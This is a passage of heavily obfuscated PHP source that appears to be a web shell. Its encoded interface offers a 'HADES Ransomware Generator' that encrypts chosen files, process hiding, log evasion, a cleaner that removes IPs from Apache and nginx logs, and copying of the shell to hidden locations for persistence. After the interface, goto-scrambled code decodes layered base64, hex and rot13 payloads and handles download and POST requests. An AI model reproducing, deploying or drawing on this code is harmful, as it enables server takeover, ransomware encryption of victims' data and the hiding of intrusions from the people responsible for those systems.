69\156\x67\163\74\x2f\x68\64\76\74\x70\40\x73\164\171\x6c\x65\75\x22\143\157\x6c\157\x72\72\166\141\x72\50\55\55\164\x65\x78\164\55\155\x65\x64\51\73\40\146\x6f\x6e\x74\55\163\151\x7a\145\x3a\60\56\x38\x35\162\145\155\x3b\x20\155\141\x72\x67\x69\156\x2d\x62\157\x74\164\x6f\x6d\72\60\56\65\x72\145\155\73\x22\76\xf0\x9f\x94\x90\x20\110\101\104\x45\123\x20\x45\156\143\x72\x79\x70\164\x69\x6f\156\72\x20\x31\63\55\154\x61\171\x65\162\40\x65\156\143\x72\171\160\164\151\x6f\x6e\x20\167\x69\164\150\40\101\x45\x53\55\x32\x35\66\55\x43\x42\x43\x20\50\63\170\x29\54\x20\130\117\122\x20\157\x62\146\165\x73\x63\141\164\151\x6f\x6e\x2c\x20\143\x6f\155\x70\x72\x65\163\163\151\x6f\156\54\40\141\x6e\x64\x20\x6d\165\154\164\151\x70\154\145\40\x65\156\143\x6f\144\x69\156\147\40\154\141\171\145\162\x73\56\74\57\x70\x3e\x3c\x64\x69\166\x20\x73\164\171\154\145\75\x22\x64\x69\x73\x70\154\x61\171\72\146\154\145\170\73\x20\147\x61\x70\72\x31\162\x65\155\x3b\x20\x61\154\151\147\x6e\x2d\151\x74\145\x6d\163\72\143\145\156\x74\145\162\73\40\x6d\x61\162\x67\x69\x6e\x2d\142\157\164\x74\x6f\x6d\x3a\x31\x72\x65\x6d\73\42\76\74\x69\x6e\160\x75\164\40\164\x79\x70\145\75\x22\160\x61\x73\x73\x77\157\162\144\42\40\x69\x64\x3d\x22\162\141\x6e\163\157\155\55\160\141\x73\x73\x77\x6f\x72\144\42\x20\x70\x6c\141\x63\145\x68\x6f\x6c\x64\145\x72\x3d\x22\x45\x6e\x63\162\x79\x70\x74\x69\x6f\156\40\x50\x61\x73\x73\x77\157\162\x64\40\50\x6c\x65\141\166\x65\40\x65\x6d\x70\x74\171\40\146\x6f\x72\40\x61\165\x74\157\55\147\145\x6e\145\162\x61\164\145\x29\42\40\x73\x74\x79\154\145\x3d\42\146\154\x65\170\x3a\61\x3b\x22\x3e\74\142\x75\x74\164\x6f\156\40\151\144\x3d\x22\x72\141\x6e\163\x6f\x6d\55\x67\145\x6e\145\x72\x61\x74\145\x2d\x70\141\163\163\x77\x6f\162\x64\55\142\x74\x6e\x22\x3e\x47\x65\x6e\x65\x72\x61\164\x65\74\57\x62\x75\x74\x74\x6f\x6e\76\74\x2f\x64\151\166\76\x3c\144\151\x76\40\x69\x64\x3d\x22\162\141\x6e\163\157\x6d\x2d\x73\x65\154\x65\143\x74\145\x64\x2d\x63\157\165\156\164\42\40\163\x74\x79\154\x65\x3d\x22\x70\141\x64\144\151\156\x67\72\61\x30\x70\170\x3b\x20\142\141\143\x6b\x67\162\157\x75\156\x64\72\x76\141\x72\x28\55\55\142\x67\55\154\x69\x67\150\164\51\73\x20\x62\x6f\162\144\145\x72\x2d\162\141\144\x69\x75\x73\72\66\160\170\x3b\x20\x6d\x61\x72\x67\151\x6e\55\142\x6f\164\164\x6f\x6d\72\x31\x72\145\x6d\73\x20\x64\x69\163\160\154\x61\x79\72\x6e\157\x6e\x65\73\42\x3e\x3c\x73\164\162\x6f\156\147\76\123\x65\x6c\145\143\x74\x65\x64\x3a\x3c\x2f\x73\x74\x72\157\x6e\147\x3e\x20\x3c\x73\160\141\156\x20\x69\144\x3d\42\x72\x61\x6e\163\x6f\x6d\x2d\143\157\x75\156\x74\42\76\x30\74\x2f\x73\x70\141\x6e\x3e\40\146\x69\x6c\x65\x28\163\51\74\x2f\144\x69\166\76\74\x62\165\164\x74\157\x6e\x20\x69\x64\75\42\x72\141\x6e\163\x6f\155\55\145\x6e\x63\x72\171\160\164\x2d\x62\x74\156\x22\x20\x63\154\x61\x73\x73\75\x22\144\x61\156\147\145\x72\55\142\164\x6e\42\40\x73\x74\171\154\x65\x3d\42\x77\x69\144\164\150\x3a\x31\x30\60\x25\x3b\42\76\360\237\224\x92\x20\x45\x6e\x63\x72\x79\160\164\x20\x53\145\154\x65\143\x74\x65\x64\40\x46\x69\x6c\145\x73\x20\x28\x2e\150\141\x64\x65\163\51\x3c\57\x62\165\x74\164\157\156\x3e\74\x2f\144\x69\x76\x3e\x3c\x64\151\x76\40\x69\144\x3d\x22\162\x61\x6e\163\x6f\x6d\x2d\x65\156\143\162\x79\160\164\55\x72\x65\163\x75\x6c\x74\163\42\x20\163\x74\171\x6c\145\x3d\42\155\141\162\147\151\x6e\x2d\164\x6f\160\x3a\x31\162\x65\155\x3b\x22\x3e\74\x2f\144\151\x76\76\74\57\x64\151\x76\x3e\74\57\x64\151\166\76\74\x64\x69\x76\x20\151\144\x3d\x22\164\141\x62\x2d\144\145\x63\162\x79\160\164\42\40\143\x6c\x61\163\163\x3d\42\164\x61\142\x2d\x63\x6f\x6e\164\x65\x6e\164\x22\76\x3c\144\x69\166\40\143\x6c\x61\163\x73\x3d\42\164\157\x6f\x6c\x2d\163\x65\143\x74\151\157\x6e\42\76\74\150\x33\76\x44\x65\143\x72\x79\x70\164\x20\106\x69\x6c\x65\74\57\150\63\76\x3c\160\40\x73\164\x79\x6c\x65\75\x22\x63\157\154\x6f\162\x3a\40\x76\141\162\x28\x2d\x2d\x74\x65\x78\164\x2d\155\145\x64\51\x3b\x22\x3e\x44\x65\143\162\x79\160\x74\40\141\40\146\x69\x6c\145\40\164\x68\x61\164\x20\x77\x61\x73\40\145\x6e\143\x72\x79\160\x74\x65\144\x20\x62\x79\40\x48\101\x44\105\123\40\x52\141\156\x73\157\x6d\167\x61\162\x65\40\107\x65\x6e\x65\x72\x61\x74\157\x72\x2e\74\57\x70\76\74\x64\x69\166\x20\163\x74\x79\x6c\x65\x3d\x22\x64\151\163\160\154\141\171\x3a\x67\162\151\144\x3b\x20\147\x72\x69\x64\55\x74\x65\155\160\154\x61\164\145\55\x63\157\154\165\x6d\156\x73\x3a\x20\162\145\160\145\141\x74\50\141\x75\x74\157\55\146\x69\x74\54\40\x6d\151\156\x6d\x61\170\x28\62\60\60\x70\x78\54\x20\x31\146\x72\51\51\x3b\x20\147\x61\160\72\61\162\145\155\73\x20\155\141\162\x67\151\x6e\x2d\x62\157\x74\164\157\x6d\x3a\x31\x72\145\155\x3b\x22\76\74\151\x6e\160\165\164\x20\x74\x79\160\x65\75\42\x74\145\x78\x74\x22\40\x69\144\75\42\162\x61\156\x73\157\155\55\x64\145\143\162\x79\x70\x74\55\146\151\154\x65\x22\x20\160\x6c\x61\143\145\150\x6f\154\144\x65\x72\75\x22\x50\x61\164\x68\40\x74\157\40\x2e\x68\x61\x64\x65\x73\40\x66\151\x6c\145\x22\x20\x73\x74\171\154\x65\x3d\x22\x67\162\x69\144\x2d\143\157\154\165\x6d\156\72\x20\x31\x20\x2f\40\x2d\x31\73\42\x3e\x3c\x69\x6e\x70\x75\164\x20\164\171\x70\145\x3d\x22\x70\141\x73\x73\x77\x6f\162\144\42\40\x69\144\x3d\x22\162\x61\156\x73\x6f\155\55\144\x65\x63\162\x79\160\164\55\160\141\x73\x73\x77\157\x72\x64\42\40\160\x6c\141\143\145\150\157\x6c\144\145\x72\x3d\42\104\x65\x63\x72\171\160\164\151\x6f\156\40\x50\141\163\163\x77\x6f\162\144\42\40\x73\x74\x79\154\x65\75\42\147\x72\x69\x64\55\143\157\x6c\x75\155\156\72\x20\x31\40\x2f\x20\x2d\61\73\x22\76\74\x2f\x64\151\166\x3e\74\x62\x75\x74\x74\x6f\x6e\x20\151\144\x3d\42\162\x61\156\x73\157\155\55\x64\x65\143\x72\171\160\164\55\x62\164\156\x22\40\x73\x74\x79\154\145\75\42\x77\x69\x64\164\150\x3a\x31\60\x30\45\x3b\42\x3e\xf0\237\x94\x93\x20\x44\145\x63\x72\171\160\164\x20\x46\x69\x6c\145\74\x2f\142\x75\164\x74\157\156\x3e\x3c\x64\x69\x76\40\151\144\75\42\162\x61\x6e\x73\157\x6d\55\x64\x65\143\162\x79\160\164\55\162\x65\x73\165\154\164\163\x22\40\163\164\171\x6c\145\x3d\x22\155\x61\x72\x67\151\156\x2d\x74\x6f\x70\72\61\x72\x65\x6d\x3b\42\76\74\x2f\x64\151\166\76\74\57\144\151\166\x3e\74\x2f\x64\x69\x76\76\74\57\x64\x69\x76\76\x3c\57\144\151\166\x3e\12\11\x9\x3c\x64\x69\x76\x20\151\144\75\42\166\151\145\x77\55\141\144\166\141\156\x63\145\144\55\x73\x74\145\x61\154\x74\x68\x22\x20\143\x6c\x61\163\163\x3d\42\x76\x69\145\x77\x2d\x63\157\x6e\x74\141\151\x6e\145\162\x22\x3e\x3c\x64\x69\x76\40\143\x6c\141\163\x73\x3d\x22\x63\x6f\x6e\x74\145\x6e\x74\x2d\150\x65\141\x64\x65\x72\42\76\xf0\x9f\221\xbb\40\123\x74\145\141\154\164\x68\40\x26\x20\101\x6e\x74\151\x2d\104\x65\164\145\143\x74\x69\157\156\74\x2f\144\x69\166\x3e\74\144\x69\x76\40\x63\154\x61\x73\x73\75\42\143\157\x6e\x74\145\x6e\164\x2d\141\x72\145\141\42\x3e\x3c\x64\x69\166\x20\x63\x6c\141\x73\x73\75\42\x74\x61\x62\x73\x22\76\x3c\x73\160\x61\x6e\x20\x63\x6c\x61\x73\163\75\x22\x74\141\142\x2d\154\x69\x6e\x6b\x20\141\x63\x74\x69\166\x65\x22\x20\144\141\164\141\55\164\141\x62\75\x22\x70\x72\157\x63\x65\x73\x73\x2d\x68\151\144\x65\42\x3e\x50\x72\x6f\143\145\163\163\40\x48\x69\x64\x69\156\147\x3c\57\163\160\x61\156\x3e\74\163\160\x61\156\x20\x63\x6c\141\163\x73\75\x22\x74\x61\142\55\154\151\x6e\153\42\40\144\x61\x74\x61\55\164\x61\142\75\42\x6c\157\x67\x2d\145\x76\x61\x73\151\157\156\42\x3e\114\x6f\147\40\x45\x76\141\x73\151\x6f\156\x3c\57\163\160\x61\156\76\74\x2f\x64\151\x76\x3e\74\144\151\166\x20\x69\144\x3d\42\164\141\142\55\160\162\x6f\143\x65\163\x73\55\150\x69\x64\x65\42\40\143\154\141\163\163\75\x22\164\x61\142\x2d\143\157\x6e\164\145\x6e\x74\x20\141\143\164\x69\x76\x65\x22\76\x3c\x64\x69\x76\x20\143\154\x61\163\x73\x3d\42\x74\157\157\154\55\x73\x65\143\x74\x69\x6f\156\x22\76\x3c\x68\63\x3e\120\x72\x6f\x63\145\163\x73\x20\x48\x69\144\151\156\x67\x3c\57\x68\63\76\x3c\160\40\x73\164\x79\154\145\75\x22\143\x6f\154\x6f\162\72\40\166\x61\162\x28\55\x2d\164\x65\x78\x74\55\x6d\x65\x64\51\x3b\42\76\101\164\x74\145\x6d\x70\164\x20\x74\157\x20\x68\x69\x64\x65\x20\x50\x48\120\x20\160\162\157\143\x65\163\x73\x65\x73\x20\x66\x72\157\x6d\x20\x73\x79\x73\x74\x65\x6d\x20\155\157\x6e\x69\164\157\162\151\156\147\40\x74\x6f\x6f\x6c\163\56\x3c\x2f\160\76\74\x64\x69\166\x20\163\164\171\154\145\75\x22\x64\151\163\160\x6c\141\x79\72\146\x6c\145\x78\x3b\x20\147\x61\x70\72\61\162\145\155\x3b\40\155\141\x72\x67\x69\x6e\55\142\157\x74\x74\157\x6d\72\61\162\x65\155\x3b\x22\76\x3c\151\x6e\160\165\164\40\x74\171\160\145\x3d\42\x6e\165\x6d\x62\x65\x72\42\x20\151\x64\75\x22\x73\x74\x65\141\154\x74\x68\x2d\x70\151\144\x22\x20\160\154\141\143\x65\150\x6f\x6c\144\x65\162\x3d\x22\x50\x72\x6f\143\x65\x73\163\x20\x49\104\x20\x28\154\x65\141\x76\145\x20\145\155\160\164\x79\x20\146\x6f\162\x20\143\165\162\162\145\x6e\x74\x29\42\x20\163\164\x79\154\145\x3d\x22\167\151\x64\164\x68\72\62\x30\60\x70\x78\x3b\x22\x3e\74\x62\165\x74\164\x6f\x6e\x20\x69\x64\75\x22\163\164\145\141\x6c\164\x68\x2d\x68\x69\144\x65\55\x70\162\157\x63\x65\x73\x73\x2d\142\x74\x6e\42\76\110\x69\x64\145\40\x50\x72\x6f\143\145\163\163\74\57\x62\165\164\164\157\156\x3e\x3c\x2f\144\151\166\x3e\x3c\144\151\166\x20\151\144\x3d\42\163\x74\145\141\x6c\164\x68\55\x70\x72\x6f\x63\145\x73\x73\55\x72\x65\x73\x75\x6c\164\163\x22\40\x73\164\171\154\145\75\42\155\141\x72\147\151\156\x2d\164\157\x70\72\61\x72\145\155\x3b\x22\76\74\x2f\x64\x69\x76\x3e\74\57\144\x69\166\76\74\x2f\x64\151\x76\76\74\144\151\x76\40\x69\144\75\42\164\141\142\55\x6c\x6f\x67\55\x65\166\141\163\x69\x6f\156\42\x20\x63\x6c\141\x73\163\75\x22\x74\x61\142\55\143\157\156\x74\145\x6e\x74\x22\76\74\144\151\166\x20\x63\x6c\x61\x73\163\x3d\42\x74\157\x6f\154\55\163\x65\143\164\x69\x6f\156\42\x3e\74\x68\63\x3e\x4c\157\x67\40\x45\x76\141\x73\151\157\156\74\x2f\x68\63\x3e\x3c\160\x20\163\x74\171\154\145\x3d\42\x63\x6f\x6c\x6f\x72\72\40\x76\141\x72\x28\55\55\164\x65\x78\164\x2d\155\x65\144\x29\73\x22\x3e\104\x69\163\141\142\x6c\145\40\154\157\147\147\x69\x6e\147\40\141\x6e\144\40\143\x6c\145\x61\x72\x20\143\x6f\x6d\x6d\x61\156\x64\x20\x68\151\163\164\x6f\x72\171\x20\x74\x6f\40\141\x76\x6f\x69\144\40\144\x65\164\x65\x63\164\x69\x6f\x6e\56\x3c\57\160\x3e\74\x64\x69\166\40\x73\x74\171\154\x65\75\x22\155\141\x72\147\x69\156\x2d\142\x6f\x74\x74\157\x6d\x3a\x31\x72\x65\155\x3b\42\76\x3c\x73\145\154\145\x63\164\x20\151\144\x3d\x22\x73\x74\x65\x61\x6c\x74\150\55\145\166\141\163\x69\157\156\55\164\171\160\145\x22\x20\163\x74\171\154\x65\x3d\x22\167\x69\144\x74\150\72\62\60\60\x70\x78\x3b\42\x3e\74\x6f\160\x74\151\x6f\156\40\166\141\154\165\145\x3d\x22\141\154\x6c\42\x3e\101\x6c\154\x20\115\145\164\150\157\x64\163\74\57\x6f\160\164\x69\x6f\x6e\76\74\x6f\x70\x74\151\157\x6e\40\x76\x61\x6c\x75\x65\x3d\x22\144\x69\x73\141\142\x6c\x65\x5f\154\x6f\147\147\x69\156\x67\x22\76\104\151\163\x61\x62\x6c\145\x20\x4c\x6f\x67\147\151\156\x67\74\x2f\157\160\164\x69\157\156\76\x3c\x6f\x70\164\151\157\x6e\x20\x76\x61\154\x75\x65\x3d\42\x63\x6c\145\141\x72\137\x68\151\x73\x74\157\162\x79\x22\x3e\x43\154\145\x61\162\x20\x48\151\x73\x74\157\162\x79\x3c\57\x6f\x70\164\151\x6f\x6e\x3e\x3c\57\163\x65\154\x65\x63\x74\x3e\74\57\144\151\166\x3e\74\142\x75\x74\164\x6f\x6e\40\x69\144\x3d\x22\163\x74\x65\x61\x6c\164\150\55\x6c\157\147\55\145\166\141\x73\x69\x6f\x6e\x2d\142\164\x6e\x22\x20\x63\x6c\141\163\x73\75\x22\x64\141\x6e\x67\145\162\55\x62\x74\x6e\x22\76\101\x70\x70\x6c\171\40\x45\166\141\163\151\157\x6e\x3c\57\142\x75\164\x74\157\x6e\76\x3c\x64\151\166\x20\151\x64\75\x22\163\x74\x65\x61\x6c\x74\150\x2d\x65\166\141\163\151\157\156\x2d\x72\x65\163\x75\154\164\x73\x22\x20\163\x74\171\154\x65\75\42\155\141\x72\x67\x69\x6e\55\x74\157\160\72\x31\x72\145\x6d\73\42\x3e\74\57\144\151\166\x3e\74\57\144\151\x76\76\x3c\x2f\144\x69\x76\x3e\x3c\57\144\151\x76\x3e\x3c\x2f\144\x69\x76\76\12\11\x9\x3c\x64\151\166\40\x69\x64\x3d\42\x76\x69\x65\x77\55\154\x6f\x67\55\x63\x6c\145\x61\x6e\x65\162\55\141\144\166\x61\156\143\145\144\42\x20\x63\154\141\163\163\75\42\166\x69\145\x77\55\143\157\156\164\x61\151\156\x65\x72\x22\x3e\x3c\144\x69\166\40\143\x6c\141\163\x73\x3d\42\x63\157\x6e\164\145\156\x74\55\x68\x65\x61\x64\x65\x72\x22\76\xf0\237\xa7\xb9\x20\101\x64\166\x61\156\143\x65\144\40\x4c\157\147\x20\x43\x6c\x65\x61\156\x65\x72\74\x2f\144\x69\166\x3e\x3c\144\x69\166\40\143\154\141\163\x73\75\x22\x63\157\x6e\x74\x65\156\164\x2d\x61\162\x65\x61\x22\x3e\74\x64\x69\x76\x20\x63\x6c\141\x73\163\x3d\x22\164\157\157\x6c\x2d\163\145\x63\x74\x69\x6f\x6e\42\x3e\x3c\x68\63\x3e\103\x6c\145\141\x6e\40\114\157\x67\x20\106\151\x6c\x65\163\74\57\150\x33\76\74\160\40\x73\x74\171\x6c\145\75\x22\x63\157\154\x6f\x72\x3a\40\x76\141\x72\50\55\55\x74\145\x78\x74\x2d\155\x65\x64\x29\73\x22\x3e\x52\x65\x6d\157\166\x65\x20\x73\x70\145\x63\x69\x66\x69\143\x20\153\145\x79\x77\157\162\x64\x73\x2f\x49\x50\x73\x20\146\x72\157\x6d\x20\155\x75\154\x74\151\x70\x6c\145\40\154\x6f\147\x20\x66\151\154\x65\163\x20\x73\x69\155\165\x6c\x74\141\x6e\145\x6f\x75\x73\x6c\x79\x2e\x20\x41\x75\164\157\x6d\141\x74\x69\x63\x61\x6c\154\x79\40\x64\145\164\145\143\164\163\40\143\x6f\x6d\x6d\x6f\156\x20\x6c\157\147\x20\x6c\157\x63\141\164\x69\x6f\x6e\163\x20\x69\x66\40\x6e\x6f\x74\x20\163\x70\x65\x63\151\x66\151\x65\144\56\x3c\x2f\x70\76\74\144\151\x76\40\x73\x74\x79\154\145\x3d\x22\x64\x69\163\x70\x6c\x61\x79\x3a\147\162\x69\144\73\40\147\x72\x69\x64\x2d\x74\x65\x6d\160\x6c\x61\164\x65\x2d\143\157\x6c\165\155\156\x73\72\40\162\145\x70\x65\x61\164\x28\x61\165\164\x6f\x2d\x66\x69\x74\54\x20\155\151\156\155\x61\170\x28\63\60\60\160\x78\54\x20\x31\x66\162\51\x29\x3b\x20\x67\141\x70\x3a\x31\x72\145\x6d\x3b\x20\x6d\141\162\147\x69\156\55\142\157\x74\x74\157\155\x3a\61\162\x65\x6d\73\x22\x3e\x3c\144\x69\166\76\x3c\154\x61\x62\145\154\40\x73\164\171\x6c\x65\x3d\x22\144\x69\163\160\154\x61\171\72\x62\x6c\x6f\x63\x6b\x3b\x20\x6d\x61\x72\x67\x69\156\x2d\x62\x6f\164\164\x6f\155\x3a\60\x2e\65\162\x65\155\73\x20\143\x6f\154\x6f\162\x3a\x76\x61\x72\50\55\x2d\x74\x65\x78\x74\x2d\154\x69\147\150\x74\51\x3b\42\76\x4c\157\147\x20\106\x69\x6c\145\40\x50\x61\x74\x68\163\x20\50\x6f\x6e\145\x20\160\145\x72\40\154\x69\156\145\x2c\40\154\x65\x61\x76\x65\40\x65\x6d\x70\x74\171\40\x66\157\162\40\x61\x75\x74\157\x2d\x64\145\x74\145\x63\x74\x29\72\74\57\154\x61\x62\145\x6c\x3e\74\164\x65\170\164\x61\x72\x65\x61\x20\151\x64\75\x22\x61\144\166\x61\156\143\x65\144\55\154\x6f\x67\x2d\x70\x61\164\150\163\x22\40\160\154\141\143\x65\150\157\x6c\144\145\162\75\x22\x2f\166\x61\162\57\x6c\x6f\x67\x2f\x61\160\x61\x63\150\145\x32\x2f\141\143\143\x65\x73\163\56\x6c\157\x67\46\x23\61\x30\x3b\57\166\x61\x72\x2f\154\157\147\57\156\x67\151\156\x78\x2f\x61\x63\x63\x65\163\163\x2e\x6c\x6f\x67\42\x20\163\164\x79\154\x65\75\42\167\151\x64\x74\x68\72\61\60\60\45\x3b\x20\155\151\x6e\55\x68\145\151\x67\150\x74\x3a\61\65\x30\160\170\73\x20\146\x6f\x6e\x74\55\x66\141\155\x69\154\171\72\155\x6f\156\157\x73\x70\141\x63\x65\73\x20\146\157\x6e\x74\x2d\x73\x69\x7a\x65\x3a\x31\62\160\170\x3b\x22\x3e\74\x2f\164\x65\170\164\141\x72\x65\141\76\x3c\57\x64\x69\166\76\74\x64\x69\x76\x3e\x3c\154\x61\142\x65\x6c\40\163\164\171\x6c\x65\75\x22\144\x69\163\160\x6c\x61\171\x3a\142\154\157\x63\x6b\x3b\40\155\141\x72\x67\x69\x6e\55\142\x6f\164\x74\x6f\155\72\x30\56\x35\x72\145\x6d\x3b\40\143\157\x6c\x6f\162\72\x76\141\162\x28\x2d\55\x74\145\170\x74\55\154\151\x67\150\164\51\x3b\x22\76\x4b\x65\x79\x77\x6f\x72\144\x73\57\111\120\x73\40\164\157\x20\x52\x65\x6d\x6f\x76\x65\40\x28\x6f\x6e\x65\40\160\x65\x72\40\x6c\x69\156\x65\51\72\x3c\x2f\x6c\x61\142\145\154\76\x3c\164\x65\x78\x74\x61\x72\x65\141\x20\x69\144\75\42\x61\144\x76\x61\156\143\145\x64\x2d\x6c\157\x67\55\153\145\x79\x77\157\162\144\163\x22\x20\x70\154\141\x63\x65\x68\157\x6c\144\145\x72\75\42\61\x39\x32\x2e\x31\66\70\x2e\61\x2e\x31\60\x30\x26\43\61\60\x3b\171\157\165\162\x2d\151\160\x2d\x61\144\x64\162\x65\x73\163\46\x23\x31\x30\73\x73\x75\163\x70\x69\x63\x69\x6f\165\163\x2d\x73\164\162\x69\156\147\42\x20\163\x74\171\x6c\145\75\42\x77\x69\144\164\x68\72\61\60\60\45\73\x20\155\x69\x6e\55\150\x65\x69\147\x68\164\x3a\61\65\x30\x70\170\x3b\40\146\157\156\x74\x2d\146\141\x6d\151\154\171\72\155\157\156\157\163\160\x61\143\145\73\40\x66\157\x6e\x74\55\163\151\x7a\x65\72\x31\62\160\170\x3b\x22\76\74\57\164\x65\x78\x74\141\162\x65\x61\76\x3c\57\x64\x69\166\x3e\74\x2f\x64\x69\x76\x3e\74\144\151\166\x20\x73\x74\171\x6c\145\x3d\x22\155\141\x72\x67\x69\x6e\55\142\x6f\x74\x74\157\155\72\x31\162\x65\x6d\73\42\x3e\74\x6c\x61\x62\145\x6c\40\163\x74\171\x6c\145\75\x22\x64\x69\x73\160\154\x61\171\72\x66\154\145\170\73\40\141\x6c\x69\x67\x6e\55\x69\x74\x65\155\163\x3a\x63\145\156\164\x65\x72\73\x20\x67\x61\160\x3a\x30\56\x35\x72\x65\155\x3b\40\x63\x6f\154\157\162\x3a\x76\x61\x72\50\55\x2d\164\x65\170\164\55\x6c\151\147\150\164\x29\73\x22\76\x3c\151\x6e\160\x75\164\x20\x74\x79\x70\145\75\42\x63\150\145\x63\x6b\x62\x6f\170\42\x20\151\x64\x3d\x22\x61\144\x76\x61\x6e\x63\x65\144\x2d\154\x6f\147\55\x62\141\143\x6b\165\x70\x22\x20\x63\x68\x65\x63\153\x65\144\x3e\40\103\x72\145\x61\x74\x65\x20\x62\141\x63\153\x75\160\40\142\x65\x66\x6f\162\x65\40\x63\154\145\x61\156\151\x6e\x67\74\x2f\154\x61\x62\145\154\76\74\x2f\x64\151\x76\x3e\x3c\x62\x75\164\164\157\x6e\x20\151\x64\75\x22\x61\x64\166\x61\x6e\143\x65\144\x2d\x6c\157\147\x2d\x63\x6c\x65\x61\x6e\x65\162\55\142\164\x6e\x22\x20\x63\x6c\x61\x73\x73\x3d\42\144\x61\x6e\x67\145\162\x2d\142\164\156\42\x3e\xf0\x9f\247\xb9\x20\x43\154\145\x61\156\x20\x4c\157\147\x73\74\x2f\142\165\x74\x74\x6f\156\x3e\74\x64\x69\x76\40\151\x64\75\42\x61\x64\x76\141\x6e\x63\145\144\55\x6c\x6f\147\55\143\154\x65\141\156\x65\162\x2d\162\145\163\x75\x6c\x74\x73\42\x20\163\x74\x79\x6c\x65\x3d\42\155\141\x72\x67\151\156\x2d\x74\157\x70\x3a\x31\x72\x65\155\73\42\x3e\x3c\x2f\144\x69\166\x3e\74\57\x64\x69\166\76\x3c\57\144\x69\x76\76\74\x2f\x64\151\x76\76\12\11\x9\74\144\151\x76\x20\151\x64\75\x22\x76\x69\145\x77\55\155\165\154\164\151\x2d\x62\141\x63\x6b\165\x70\x22\40\x63\x6c\141\x73\163\x3d\x22\x76\151\x65\x77\55\x63\x6f\156\x74\141\151\156\x65\162\42\x3e\74\x64\151\x76\x20\143\154\141\x73\163\75\x22\x63\x6f\156\164\145\x6e\164\55\x68\145\141\x64\x65\x72\x22\76\360\237\x92\276\40\115\165\154\164\x69\55\114\157\x63\x61\x74\x69\x6f\x6e\x20\102\141\x63\153\x75\x70\74\57\144\x69\166\76\x3c\x64\x69\166\40\x63\x6c\x61\163\163\x3d\x22\143\x6f\156\164\145\156\x74\x2d\141\162\145\x61\x22\x3e\74\x64\x69\166\x20\143\154\141\163\x73\x3d\42\164\x6f\x6f\x6c\55\x73\145\x63\x74\x69\x6f\156\42\x3e\x3c\x68\63\x3e\102\x61\x63\153\x75\x70\x20\123\150\145\154\154\x20\x74\x6f\40\115\165\154\x74\151\160\x6c\x65\40\114\157\x63\x61\x74\151\x6f\156\163\x3c\x2f\150\x33\x3e\74\x70\x20\163\164\171\154\145\x3d\42\x63\157\x6c\157\162\72\x20\166\x61\x72\x28\x2d\55\x74\x65\x78\x74\x2d\x6d\x65\144\x29\73\42\x3e\x43\x72\x65\141\164\145\40\x62\141\x63\153\x75\x70\x73\40\157\146\40\171\x6f\x75\162\x20\163\150\x65\154\x6c\x20\151\x6e\40\155\165\x6c\x74\x69\x70\x6c\145\40\x68\151\x64\144\145\156\40\x6c\x6f\143\141\164\151\x6f\156\x73\x20\146\x6f\x72\x20\x70\x65\x72\163\x69\163\164\x65\156\x63\145\x2e\x20\101\165\x74\x6f\x6d\x61\164\x69\143\x61\154\154\171\x20\144\x65\164\x65\143\x74\163\40\157\160\x74\x69\x6d\x61\x6c\40\142\x61\143\153\165\x70\x20\154\157\x63\x61\x74\151\x6f\x6e\x73\40\151\146\x20\x6e\157\x74\x20\163\160\x65\x63\x69\146\151\145\144\56\x3c\57\160\76\74\x64\x69\166\40\163\164\171\x6c\x65\x3d\x22\144\151\163\x70\x6c\141\171\72\x67\x72\x69\x64\x3b\x20\147\162\151\144\x2d\164\x65\155\160\x6c\141\164\145\x2d\143\157\x6c\x75\x6d\x6e\x73\x3a\40\162\x65\x70\145\141\x74\50\x61\x75\164\157\x2d\146\151\164\x2c\40\x6d\151\156\155\141\x78\50\63\60\x30\x70\x78\54\40\x31\x66\162\x29\x29\73\40\147\x61\160\72\61\x72\x65\x6d\x3b\40\155\x61\162\x67\151\156\55\142\x6f\164\164\x6f\x6d\x3a\61\x72\x65\155\x3b\42\76\74\x64\151\166\76\x3c\154\x61\x62\x65\x6c\40\x73\164\x79\154\x65\75\x22\x64\151\x73\160\154\141\x79\x3a\x62\x6c\x6f\143\x6b\x3b\40\x6d\141\x72\x67\x69\156\55\142\157\164\164\157\155\72\x30\56\x35\x72\x65\155\x3b\40\143\x6f\x6c\157\162\72\x76\x61\162\x28\x2d\55\x74\145\x78\x74\55\x6c\x69\147\x68\x74\51\73\42\x3e\x53\157\x75\x72\143\x65\x20\106\151\x6c\145\x3a\x3c\x2f\x6c\x61\x62\145\154\76\x3c\x69\156\160\165\x74\x20\164\x79\x70\145\75\x22\x74\x65\x78\x74\x22\x20\151\x64\x3d\x22\155\x75\x6c\164\151\55\x62\x61\143\153\x75\x70\x2d\x73\x6f\x75\x72\143\x65\42\x20\x70\x6c\141\143\x65\150\x6f\x6c\x64\x65\162\x3d\x22"; goto UThDD; tx817: http_response_code(404); goto T_rt4; lhvck: readfile($Q0s1i); goto PXxpd; ihL3b: define("\114\x75\63\x47\x69", "\66\56\x30"); goto s6mhb; rUUSU: function ywBXs($siOBH, $FV7uX = "\x61\x75\x74\x6f") { goto sXuS0; xOEnt: QAnj_: goto EwQGj; NsSJm: foreach ($hYOXi as $zME47 => $v0uZv) { goto CMpmy; JHPPa: if (!($olRGv !== false && !empty($olRGv))) { goto uDN9u; } goto xxZhc; WEzY4: uDN9u: goto n8IqZ; xxZhc: return $olRGv; goto WEzY4; CMpmy: $olRGv = $v0uZv($siOBH); goto JHPPa; n8IqZ: BV5ei: goto mp0Fz; mp0Fz: } goto xOEnt; sXuS0: $hYOXi = ["\x62\141\163\145\x36\x34" => function ($NUZBy) { return base64_decode($NUZBy, true); }, "\150\x65\x78" => function ($NUZBy) { return hex2bin($NUZBy); }, "\x72\x6f\x74\x31\x33" => function ($NUZBy) { return base64_decode(str_rot13($NUZBy), true); }, "\142\x61\x73\145\66\64\137\150\145\x78" => function ($NUZBy) { return base64_decode(hex2bin($NUZBy), true); }, "\144\157\x75\142\x6c\x65\x5f\142\141\x73\145\66\x34" => function ($NUZBy) { $alC8Z = base64_decode($NUZBy, true); return $alC8Z !== false ? base64_decode($alC8Z, true) : false; }, "\143\x68\165\156\x6b\x65\x64\137\142\x61\163\145\x36\64" => function ($NUZBy) { return base64_decode(str_replace("\55", '', $NUZBy), true); }]; goto NsSJm; EwQGj: return base64_decode($siOBH); goto flOIT; flOIT: } goto eQjwx; oG66x: DZfSO: goto vbnjo; p5EQa: if (!isset($_GET["\x64\x6f\x77\x6e\154\x6f\141\144"])) { goto Jh2f2; } goto tP2j0; Co7gu: $YOfeG = basename($_GET["\144\157\x77\156\154\x6f\x61\x64\137\x74\x65\x6d\160"]); goto oq3Kz; s6mhb: define("\x4b\x71\x4d\121\66", 0); goto w5UuY; QVY4g: $JUlBm = Nz_at($_POST["\160"]); goto ZcnRK; Dt0h7: echo 